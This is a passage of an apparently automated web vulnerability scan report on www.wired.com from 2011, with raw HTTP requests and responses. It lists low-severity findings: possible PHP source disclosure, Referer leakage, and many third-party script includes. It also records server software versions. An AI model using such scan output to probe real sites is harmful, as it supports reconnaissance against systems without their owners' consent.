4.2. http://www.wired.com/magazine/ipad previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/magazine/ipad

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ipad HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

4.3. http://www.wired.com/playbook/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/playbook/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /playbook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

5. Cross-domain Referer leakage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/js/global.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.wired.com/js/global.js?1103

The response contains the following link to another domain:

http://0/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /js/global.js?1103 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 15:11:05 GMT
Date: Wed, 12 Jan 2011 15:01:05 GMT
Connection: close
Content-Length: 37327

//mobify include
var _mm = "http://m.wired.com/";

(function() {
if(document.domain.indexOf("howto.wired.com")>=0) {
return;
}
if(document.domain.indexOf("wired.com")>=0) {

...[SNIP]...
)
document.addEventListener("DOMContentLoaded", init, false);

// for Internet Explorer
/*@cc_on @*/
/*@if (@_win32)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

6. Cross-domain script include previous next
There are 184 instances of this issue:

/
/about/blogs
/about/faq/
/about/feedback/
/about/mobile/
/about/press/
/about/privacy-policy/
/about/rss_feeds/
/about/sitemap/
/about/staff_web/
/about/user-agreement/
/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A
/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices
/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header
/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout
/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar
/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover
/autopia/
/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/
/blogs/
/cars/
/culture/
/dangerroom/
/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/
/entertainment/
/epicenter/
/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/
/epicenter/2011/01/metropcs-net-neutrality/
/gadgetlab/
/gadgets/
/gamelife/
/gaming/
/geekdad/
/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/
/inspiredbyyou/
/js/global.js
/magazine/
/magazine/decode/
/magazine/ipad
/medtech/
/nolayout/rssproxy
/playbook/
/politics/
/rawfile/
/reviews/
/reviews/%20
/reviews/category/automotive/
/reviews/category/desktops-and-accessories/
/reviews/category/digital-cameras-and-camcorders/
/reviews/category/gaming-gear/
/reviews/category/home-audio-and-video/
/reviews/category/household/
/reviews/category/media-players/
/reviews/category/mobile-audio/
/reviews/category/mobile-phones/
/reviews/category/notebooks-and-accessories/
/reviews/category/roundups/
/reviews/category/software-and-apps/
/reviews/category/sports-and-outdoors/
/reviews/category/tablets-and-ebook-readers/
/reviews/category/televisions/
/science/
/search
/services/corrections/
/services/newsletters
/software/
/techbiz/
/thisdayintech/
/threatlevel/
/threatlevel/2006/04/reporter_vs_sub/
/threatlevel/2010/12/hacking-the-hacker-stereotypes/
/threatlevel/2010/12/transcending-the-human-diy-style/
/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/
/threatlevel/2011/01/birgitta-jonsdottir/
/threatlevel/2011/01/codebreakers-death/
/threatlevel/2011/01/dubai-assassination/
/threatlevel/2011/01/secret-tanning-camera/
/threatlevel/2011/01/vf-wikieaks/
/threatlevel/2011/01/video-poker/
/threatlevel/2011/01/wikileaks-sunken-treasure/
/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ
/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure
/threatlevel/author/kimzetter/
/threatlevel/category/announcements/
/threatlevel/category/atm-hacking/
/threatlevel/category/bittorrent/
/threatlevel/category/black-hat-conference/
/threatlevel/category/bradley-manning/
/threatlevel/category/breaches/
/threatlevel/category/censorship/
/threatlevel/category/chaos-computer-club/
/threatlevel/category/conferences/
/threatlevel/category/copyrights-and-patents/
/threatlevel/category/coverups/
/threatlevel/category/crime/
/threatlevel/category/crypto/
/threatlevel/category/cybarmageddon/
/threatlevel/category/cyber-warfare/
/threatlevel/category/cyberbullying/
/threatlevel/category/cybersecurity/
/threatlevel/category/defcon/
/threatlevel/category/digital-millennium-copyright-act/
/threatlevel/category/e-voting/
/threatlevel/category/elections/
/threatlevel/category/fed-blotter/
/threatlevel/category/glitches-and-bugs/
/threatlevel/category/hacks-and-cracks/
/threatlevel/category/hans-reiser-trial/
/threatlevel/category/identification/
/threatlevel/category/intellectual-property/
/threatlevel/category/lori-drew-trial/
/threatlevel/category/network-neutrality/
/threatlevel/category/nsa/
/threatlevel/category/openleaks/
/threatlevel/category/politics/
/threatlevel/category/porn/
/threatlevel/category/privacy/
/threatlevel/category/rfid/
/threatlevel/category/riaa-litigation/
/threatlevel/category/rsa-conference/
/threatlevel/category/sexting/
/threatlevel/category/spooks-gone-wild/
/threatlevel/category/stuxnet/
/threatlevel/category/sunshine-and-secrecy/
/threatlevel/category/surveillance/
/threatlevel/category/the-courts/
/threatlevel/category/the-ridiculous/
/threatlevel/category/threats/
/threatlevel/category/three-strikes/
/threatlevel/category/tsa/
/threatlevel/category/uncategorized/
/threatlevel/category/watchlists/
/threatlevel/category/wikileaks/
/threatlevel/category/yo-ho-ho/
/threatlevel/tag/4chan/
/threatlevel/tag/aclu/
/threatlevel/tag/al-haramain/
/threatlevel/tag/albert-gonzalez/
/threatlevel/tag/apple-iphone/
/threatlevel/tag/blackhat/
/threatlevel/tag/bradley-manning/
/threatlevel/tag/carding/
/threatlevel/tag/ccc/
/threatlevel/tag/censorship/
/threatlevel/tag/china/
/threatlevel/tag/copyright/
/threatlevel/tag/crime/
/threatlevel/tag/defcon/
/threatlevel/tag/dmca/
/threatlevel/tag/facebook/
/threatlevel/tag/fbi/
/threatlevel/tag/file-sharing/
/threatlevel/tag/first-amendment/
/threatlevel/tag/google/
/threatlevel/tag/hack/
/threatlevel/tag/hacking/
/threatlevel/tag/intellectual-property/
/threatlevel/tag/mpaa/
/threatlevel/tag/nsa/
/threatlevel/tag/obama/
/threatlevel/tag/piracy/
/threatlevel/tag/pirate-bay-trial/
/threatlevel/tag/pirate-bay/
/threatlevel/tag/politics/
/threatlevel/tag/privacy/
/threatlevel/tag/riaa/
/threatlevel/tag/segvec/
/threatlevel/tag/supreme-court/
/threatlevel/tag/surveillance/
/threatlevel/tag/tjx/
/threatlevel/tag/tsa/
/threatlevel/tag/twitter/
/threatlevel/tag/virginia-tech-shootings/
/threatlevel/tag/wikileaks/
/topics/Claude_Cassirer
/topics/Florida
/topics/Spain
/topics/United_States
/topics/Western_Europe
/topics/WikiLeaks.org
/underwire/
/video/
/video/search/
/wiredscience/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

6.1. http://www.wired.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://static.reddit.com/wired.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=105
Expires: Wed, 12 Jan 2011 15:37:32 GMT
Date: Wed, 12 Jan 2011 15:35:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 186750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<div id="river_list-elsewhere">
<script language="JavaScript" src="http://static.reddit.com/wired.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

6.2. http://www.wired.com/about/blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/blogs

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/blogs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:12:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=458
Expires: Wed, 12 Jan 2011 15:48:01 GMT
Date: Wed, 12 Jan 2011 15:40:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.3. http://www.wired.com/about/faq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/faq/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/faq/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.4. http://www.wired.com/about/feedback/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/feedback/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/feedback/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:59:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:25 GMT
Date: Wed, 12 Jan 2011 15:40:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.5. http://www.wired.com/about/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/mobile/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:28:16 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=457
Expires: Wed, 12 Jan 2011 15:48:06 GMT
Date: Wed, 12 Jan 2011 15:40:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.6. http://www.wired.com/about/press/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/press/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/press/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:48:03 GMT
Date: Wed, 12 Jan 2011 15:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.7. http://www.wired.com/about/privacy-policy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/privacy-policy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/privacy-policy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:45:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=438
Expires: Wed, 12 Jan 2011 15:48:09 GMT
Date: Wed, 12 Jan 2011 15:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.8. http://www.wired.com/about/rss_feeds/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/rss_feeds/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/rss_feeds/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:23:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:22 GMT
Date: Wed, 12 Jan 2011 15:40:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.9. http://www.wired.com/about/sitemap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/sitemap/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/sitemap/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.10. http://www.wired.com/about/staff_web/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/staff_web/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/staff_web/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:47 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:35 GMT
Date: Wed, 12 Jan 2011 15:40:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.11. http://www.wired.com/about/user-agreement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/user-agreement/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/user-agreement/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:09:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:48:30 GMT
Date: Wed, 12 Jan 2011 15:40:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
